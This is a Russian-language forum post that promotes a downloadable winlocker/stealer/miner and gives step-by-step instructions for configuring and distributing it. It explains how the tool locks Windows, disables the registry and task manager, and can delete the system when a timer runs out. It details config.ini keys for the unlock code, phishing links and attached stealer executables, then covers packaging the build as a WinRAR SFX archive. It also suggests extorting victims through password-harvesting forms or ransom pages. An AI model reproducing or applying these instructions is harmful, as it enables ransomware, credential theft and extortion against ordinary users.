Создаём stealer без программ

CBUHKEP

Пользователь
Сообщения
9
Приветствую, дорогой читатель. Наверняка ты хоть раз задумывался, как-же создать вирус без использования программ? И нет, я сейчас не говорю про простейшие .bat вирусы. Я говорю про мощнейшие трояны способные выкрасть любые пользовательские данные, даже если они не сохранены на носителе пользователя.

Представляю вам, WinLocker by lorensive98. И нет, это не имеет ничего общего с обычными баннерами, просто при первом взгляде на данное творение, у человека возникает именно такая ассоциация.

Самой главной отличительной чертой данного комбайна (stealer+winlocker+miner) является то, что для создания билда (итогового файла, который мы будем распостранять) совершенно не нужно открывать никаких сторонних программ (!). А это значит что билд можно сделать даже на Linux. И тут нет никакого подвоха.
Итак, нам понадабится:
• WinRAR (для работы с SFX-архивом)
• Любой текстовый редактор

Данный вымогатель блокирует систему (добавляется в автозагрузку, блокирует реестр, блокирует диспетчер задач естественно). В данном баннере можно установить таймер, по истечению которого применится одно из действий, например удаление Windows, разблокировка Windows или же ничего не делать (постоянно будет добавляться +10 минут, чтобы жертва теребилась, либо полная остановка таймера), но это не главное преимущество.

Ссылка на скачивание: https://2no.co/2LXh96

Главная фишка - встроенный браузер, который выполняет все JavaScript сценарии на ПК, а это значит что с устройством можно выполнить любые манипуляции. Ссылки на которые будет заходить пользователь можно задать в config.ini, таким образом можно заставить человека написать логин/пароль от желаемой учётной записи, а это лучше чем стиллер, поскольку стиллер не может украсть пароли которые не сохранены. Также можно управлять компьютером через JavaScript-сценарии, хотя это вовсе и необязательно, ведь есть возможно добавить файл, который будет открываться при нажатии на кнопку получения информации и этим файлом может быть та же программа для управления компьютером.

Из-за того что WinLock иногда попадает в антивирусные базы, процент его открытия не такой большой как FUD, но процент выполнения заданий (например вписать свой логин/пароль от почты) огромный, более 93%. Секрет большого процента профита связан с высоким психологическим вовлечением пользователя. WinLocker выполнен в красных тонах, что усиленно действует на пользователя. Постоянно тикающий таймер снижает уровень критического мышления. А верно подобранное количество строк в известном формате 1+6 (1 заглавная строка и 6 дополнительных) добивают неподготовленного пользователя.

Ссылка на скачивание: https://2no.co/2LXh96

Итак, сейчас я вам покажу как настроить данный WinLocker. (Внимание, если вы не хотите париться и не боитесь открывать программы, внутри архива есть WinLocker Builder с помощью которого можно сгенерировать config.ini. Удобный интерфейс, функция проверки ошибок, а также preview-mode с помощью которого можно просмотреть все изменения прямо на лету. Если вы используете Builder, пропускайте этот абзац, остальным приятного чтения)
Вся настройка заключается в редактировании файла config.ini.
Пример:
[texts]
line1=Вот эта первая строка
line2=А это вторая
line3=blablabla_penis_haha

Где [texts] - это ячейка
line3, line2, line1 - ключи
Знак = (равно) - обязательный знак
Знак [Enter] (перенос строки) - обязательный символ перед ключом
"blablabla_penis_haha", "А вот это вторая", "Вот это первая строка" - это значения. Значения - единственное что можно и нужно менять в файле config.ini. В значениях не рекомендуется использовать символы "!" и "=".

Настройка содержит две ячейки: [texts] и [settings]. Первая, технически, ни на что не влияет, её настройка предельно проста и я смогу её показать используя четыре рисунка (рис 1, рис 2, рис 3, рис 4).

/attachments/82338/

Рис 1. config.ini

/attachments/82339/

Рис 2. WinLocker Builder

/attachments/82340/

Рис 3. WinLock1

/attachments/82341/

Рис 4. WinLock2

Плюсы кастомизации текста заключаются в том, что с ним можно делать всё что угодно, хоть переводить на другие языки. С текстом разобрались. Теперь приступим к настройке [settings].

hour=% количество часов до желаемого действия. Принимает только числовые значения до двух знаков включительно. Не рекомендуется использовать "0". Пример: hour=23

minute=% количество минут до желаемого действия. Принимает только числовые значения до двух знаков включительно. Не рекомендуется использовать "0". Пример: minute=59

second=% количество секунд до желаемого действия. Принимает только числовые значения до двух знаков включительно. Не рекомендуется использовать "0". Пример: second=59

afterend=% действие, после окончания таймера. Может принимать лишь пять видов значений: 0, 1, 2, 3, 4. Что значит каждая цифра:
0 - Перезагрузить ПК
1 - Удалить Windows
2 - Остановить таймер и ничего не делать
3 - Добавить 10 минут времени (бесконечно)
4 - Разблокировать Windows
Пример: afterend=0

code=% самый важный ключ - код разблокировки. Пример: code=1337unlockme1337

link%=% ссылка по которой перейдёт человек во встроенном браузере. Их всего три. Внимание! Не нужно писать http(s)://! Пишите сразу ссылку без http://! Пример: link2=t.me/lorensive98

stealer=%.exe любая ваша программа запускаемая при нажатии на кнопку в баннере, не обязательно стиллер, просто чаще всего используют именно его. Пример: stealer=miner.exe

Вот и подошла к концу настройка. Теперь осталось это всё положить в наш SFX-архив, для этого нам понадобится WinRAR. Заходим в папку WinLocker, для удобства ложем туда наш config.ini и stealer.exe и следуем инструкции:
1) Жмём правой кнопкой мыши по WinLocker.exe и жмём "Открыть в WinRAR"
2) Жмём на кнопку "Добавить"
/attachments/82342/

3) Выбираем config.ini, и при желании наш дополнительный файл
/attachments/82343/

4) Нажимаем "ОК" и готово ;)
/attachments/82344/


Как использовать его решать вам. Можно создать google-форму где пользователю требуется ввести пароль, чтобы получить код и пользователь получит код на последней странице формы, а ссылку на google-форму указать в link1=%, или в качестве ссылки кинуть donate-страницу, где требуется зачислить вам пару сотен рублей. Решать вам, главное обеспечьте себя гибким средством для создания вирусов!

Ссылка на скачивание: https://2no.co/2LXh96
 
Назад
Сверху